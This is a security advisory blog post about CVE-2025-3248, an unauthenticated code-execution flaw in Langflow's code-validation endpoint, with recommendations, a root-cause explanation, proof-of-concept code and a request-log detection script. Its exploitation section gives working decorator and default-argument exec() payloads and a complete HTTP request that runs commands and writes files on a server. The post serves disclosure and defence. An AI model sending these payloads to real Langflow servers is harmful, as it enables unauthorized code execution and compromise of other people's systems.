CVE-2025-3248: RCE vulnerability in Langflow
Introduction

CVE-2025-3248, a critical remote code execution (RCE) vulnerability with a CVSS score of 9.8, has been discovered in Langflow, an open-source platform for visually composing AI-driven agents and workflows. The issue resides in the platform's /api/v1/validate/code endpoint, which passes user-supplied code to Python's built-in exec() function without authentication or sandboxing. Anyone who can reach the API can therefore execute arbitrary commands on the server, which poses a significant risk to organizations using Langflow in their AI development workflows.

Recommendations

Upgrade immediately: Upgrade to Langflow 1.3.0 or later, where the /api/v1/validate/code endpoint requires authentication.
Restrict access: Limit exposure by placing Langflow behind a ZTNA architecture such as Zscaler Private Access™ (ZPA) with AppProtection, so that the endpoint is reachable only by authorized users.
Implement input sandboxing: If custom code validation is needed, do not pass untrusted code to exec(); validate it structurally (for example, by inspecting its AST without executing it) or run it inside a sandbox.
Monitor and alert: Flag anomalous requests to validation endpoints and unexpected outbound connections from the Langflow host.

Affected Versions

All Langflow versions prior to 1.3.0 are susceptible to code injection.

Vulnerability Details

Langflow's /api/v1/validate/code endpoint mishandles user-submitted code. In versions prior to 1.3.0, the application validates function definitions by parsing the submitted code into an Abstract Syntax Tree (AST) and then compiling and executing parts of it with exec(). The steps are:

1. Parsing the code field with ast.parse().
2. Importing any modules named in import statements.
3. Compiling and executing each function definition (ast.FunctionDef) to validate its structure.

The issue arises from Python's behavior when a function is defined: decorator expressions and default argument values are evaluated immediately, at definition time, not when the function is later called.
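To make that definition-time evaluation concrete, here is an added example written for this article (it is not Langflow's own code) that reconstructs the parse, import, exec pattern described above in a minimal validator, places a parse-only validator beside it, and feeds both a decorator payload and a default-argument payload. The payloads set an environment variable as a harmless stand-in for os.system() or a file write; the function names validate_code_vulnerable, validate_code_hardened and run_through, the LANGFLOW_POC marker and the exact layout of the error dictionary are assumptions.

```python
import ast
import importlib
import importlib.util
import os

# Assumed marker: the payloads set this environment variable instead of
# running os.system() or writing a file, so the side effect is easy to observe.
MARKER = "LANGFLOW_POC"

# Constructed payloads in the two shapes discussed in the text.
DECORATOR_PAYLOAD = (
    f"@exec(\"__import__('os').environ['{MARKER}'] = 'decorator'\")\n"
    "def foo():\n"
    "    pass\n"
)
DEFAULT_ARG_PAYLOAD = (
    f"def foo(cmd=exec(\"__import__('os').environ['{MARKER}'] = 'default-arg'\")):\n"
    "    pass\n"
)


def validate_code_vulnerable(code: str) -> dict:
    """Pre-1.3.0 style flow: parse, import, then compile and exec() every FunctionDef."""
    errors = {"imports": {"errors": []}, "function": {"errors": []}}
    try:
        tree = ast.parse(code)
    except SyntaxError as exc:
        errors["function"]["errors"].append(str(exc))
        return errors
    for node in tree.body:
        if isinstance(node, ast.Import):
            for alias in node.names:
                try:
                    importlib.import_module(alias.name)  # also runs the module's top-level code
                except ModuleNotFoundError as exc:
                    errors["imports"]["errors"].append(str(exc))
        elif isinstance(node, ast.FunctionDef):
            # Executing the definition evaluates every decorator expression and
            # default value right now; foo() itself is never called.
            module = ast.Module(body=[node], type_ignores=[])
            try:
                exec(compile(module, "<user-code>", "exec"), {})
            except Exception as exc:  # report-and-continue, as a validator would
                errors["function"]["errors"].append(f"{type(exc).__name__}: {exc}")
    return errors


def validate_code_hardened(code: str) -> dict:
    """Parse-only validation: the AST is inspected, nothing is compiled or executed."""
    errors = {"imports": {"errors": []}, "function": {"errors": []}}
    try:
        tree = ast.parse(code)
    except SyntaxError as exc:
        errors["function"]["errors"].append(str(exc))
        return errors
    for node in tree.body:
        if isinstance(node, ast.Import):
            for alias in node.names:
                # find_spec resolves the top-level package on sys.path without importing it
                if importlib.util.find_spec(alias.name.partition(".")[0]) is None:
                    errors["imports"]["errors"].append(f"No module named {alias.name!r}")
        # A FunctionDef that parsed is structurally sound; its decorators and
        # defaults are left unevaluated, so submitted code cannot run here.
    return errors


def run_through(validator, code: str) -> tuple:
    """Submit code to a validator; return (marker value if the payload fired, validator result)."""
    os.environ.pop(MARKER, None)
    result = validator(code)
    return os.environ.pop(MARKER, None), result


if __name__ == "__main__":
    for label, payload in (("decorator", DECORATOR_PAYLOAD), ("default-arg", DEFAULT_ARG_PAYLOAD)):
        for validator in (validate_code_vulnerable, validate_code_hardened):
            fired, result = run_through(validator, payload)
            print(f"{validator.__name__:24} {label:12} executed={fired!r:14} "
                  f"errors={result['function']['errors']}")
```

Running it shows the vulnerable validator firing the side effect for both payloads even though foo() is never called. The decorator variant additionally records a TypeError, because exec() returns None and None cannot be applied as a decorator; that error appears only after the payload has run. The parse-only validator returns the same response structure without ever executing the submission, which is the property a code-validation endpoint needs before any question of authentication or sandboxing arises.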
Malicious code embedded in either of these positions runs as soon as the function definition is executed during validation, so an unauthenticated attacker achieves RCE simply by submitting a payload to the endpoint. Because the endpoint enforces neither authentication nor sandboxing, nothing restricts exploitation.

An overview of the attack chain is shown below:

Figure 1: Attack chain illustrating the progression of exploitation for CVE-2025-3248.

How It Works

Exploiting CVE-2025-3248 involves the following steps:

1. The attacker locates a Langflow instance running a vulnerable version (prior to 1.3.0), either one that is publicly accessible or an internal one reached through an existing foothold (for example, with compromised credentials).

2. The attacker embeds malicious code in one of two places:

a. Decorators: A decorator expression is evaluated as soon as the function definition is executed. In the example below, the decorator calls exec() with a string that runs an arbitrary shell command (here, writing the output of id to a file). The command runs the moment the code is submitted to the endpoint; the attacker never has to call foo().

@exec("import os; os.system('id > /tmp/pwned')")
def foo():
    pass

b. Default function arguments: Default values are also evaluated at definition time, so the same trick works without a decorator. In the example below, the default value of cmd calls exec() to run the env command through subprocess during validation. As written, the command's output is discarded; a real payload would write it to a file, send it out over the network, or raise it inside an exception so that it is reflected in the endpoint's error response, and it can of course perform any other action the server's privileges allow.

def foo(cmd=exec("__import__('subprocess').check_output(['env'])")):
    pass

3. The attacker sends the payload to Langflow's /api/v1/validate/code endpoint in a POST request. Below is an example request that writes a file to the server. The code field is a single JSON string, so the line breaks of the Python snippet are sent as \n escapes:

POST /api/v1/validate/code HTTP/1.1
Host: vuln-test-langflow.example.com
Content-Type: application/json
Content-Length: 120

{
  "code": "@exec(\"with open('hacked.txt', 'w') as f: f.write('This server is vulnerable')\")\ndef foo():\n    pass"
}

4. When the server processes the payload, the embedded code runs immediately during validation. An example response is shown below:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 63

{
  "imports": {"errors": []},
  "function": {"errors": []}
}

Although the response looks benign, the payload has already executed and written a file named hacked.txt on the server. Depending on how the endpoint reports exceptions, the response may instead contain an error such as 'NoneType' object is not callable: exec() returns None, which Python then fails to apply as a decorator to foo. That error is raised only after the payload has run, and the default-argument form avoids it entirely. The same technique could just as easily write a web shell to the server to establish persistent remote access.

Conclusion

CVE-2025-3248 highlights the risk of executing dynamic code without authentication and sandboxing. It is a reminder to treat code-validation features with caution, particularly in applications exposed to the internet. Zscaler ThreatLabz encourages organizations to follow the recommendations outlined in this blog.

Zscaler Coverage

The Zscaler ThreatLabz team has deployed protection for CVE-2025-3248.

Zscaler Private Access AppProtection
932200: RCE Bypass Technique

Details related to these signatures can be found in the Zscaler Threat Library.
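The "Monitor and alert" recommendation above can be implemented as a pass over request logs that looks at where a payload has to sit rather than at keywords. The following added example (not part of the original post and not Langflow's code) parses the code field of each POST to /api/v1/validate/code and flags function definitions whose decorators or default values contain anything that executes at definition time, which is exactly the position both payloads in this post use. The log format (one JSON object per request with constructed ts, src, method, path and body fields), the sample entries and the function names is_inert, definition_time_risks and scan_requests are assumptions.

```python
import ast
import json

# Constructed sample log: one JSON object per request, bodies exactly as the server received them.
SAMPLE_LOG = r'''
{"ts": "2025-04-09T10:00:01Z", "src": "10.0.0.5", "method": "POST", "path": "/api/v1/validate/code", "body": "def add(a, b=1):\n    return a + b"}
{"ts": "2025-04-09T10:00:02Z", "src": "10.0.0.5", "method": "GET", "path": "/api/v1/flows", "body": ""}
{"ts": "2025-04-09T10:00:03Z", "src": "203.0.113.7", "method": "POST", "path": "/api/v1/validate/code", "body": "@exec(\"import os; os.system('id > /tmp/pwned')\")\ndef foo():\n    pass"}
{"ts": "2025-04-09T10:00:04Z", "src": "203.0.113.7", "method": "POST", "path": "/api/v1/validate/code", "body": "def foo(cmd=exec(\"__import__('subprocess').check_output(['env'])\")):\n    pass"}
{"ts": "2025-04-09T10:00:05Z", "src": "198.51.100.2", "method": "POST", "path": "/api/v1/validate/code", "body": "def broken(:\n    pass"}
'''

VALIDATE_PATH = "/api/v1/validate/code"


def is_inert(expr: ast.expr) -> bool:
    """True when evaluating expr cannot run code: names, literals, and containers/operators over them."""
    if isinstance(expr, (ast.Name, ast.Constant)):
        return True
    if isinstance(expr, ast.Attribute):
        return is_inert(expr.value)
    if isinstance(expr, ast.UnaryOp):
        return is_inert(expr.operand)
    if isinstance(expr, ast.BinOp):
        return is_inert(expr.left) and is_inert(expr.right)
    if isinstance(expr, (ast.Tuple, ast.List, ast.Set)):
        return all(is_inert(e) for e in expr.elts)
    if isinstance(expr, ast.Dict):
        return (all(k is not None and is_inert(k) for k in expr.keys)
                and all(is_inert(v) for v in expr.values))
    # Call, Lambda, Subscript, comprehensions, f-strings and the rest may execute code.
    return False


def definition_time_risks(code: str) -> list:
    """Return (function, position, source) for every decorator or default that is not inert."""
    try:
        tree = ast.parse(code)
    except SyntaxError:
        return []  # code that does not parse never reaches exec() in the vulnerable flow
    risks = []
    for node in ast.walk(tree):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        slots = [("decorator", d) for d in node.decorator_list]
        slots += [("default", d) for d in node.args.defaults]
        slots += [("kw_default", d) for d in node.args.kw_defaults if d is not None]
        for position, expr in slots:
            if not is_inert(expr):
                risks.append((node.name, position, ast.unparse(expr)))
    return risks


def scan_requests(log_text: str) -> list:
    """Alert on every POST to the validate endpoint whose code would run something at definition time."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("method") != "POST" or rec.get("path") != VALIDATE_PATH:
            continue
        risks = definition_time_risks(rec.get("body", ""))
        if risks:
            alerts.append({"ts": rec["ts"], "src": rec["src"], "risks": risks})
    return alerts


if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_LOG):
        for func, position, source in alert["risks"]:
            print(f"{alert['ts']} {alert['src']} {func}() {position}: {source}")
```

Against the sample log this raises two alerts, both for the 203.0.113.7 client, and stays quiet for the benign definition and for the request that does not parse. Because any call expression in those positions is reported, a legitimate decorator factory such as functools.lru_cache(maxsize=8) will surface as well; in production that is handled with an allowlist of known-good decorators rather than by loosening the check, since a call in decorator or default position is precisely what the vulnerable endpoint executes.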
The post CVE-2025-3248: RCE vulnerability in Langflow appeared first on Security Boulevard.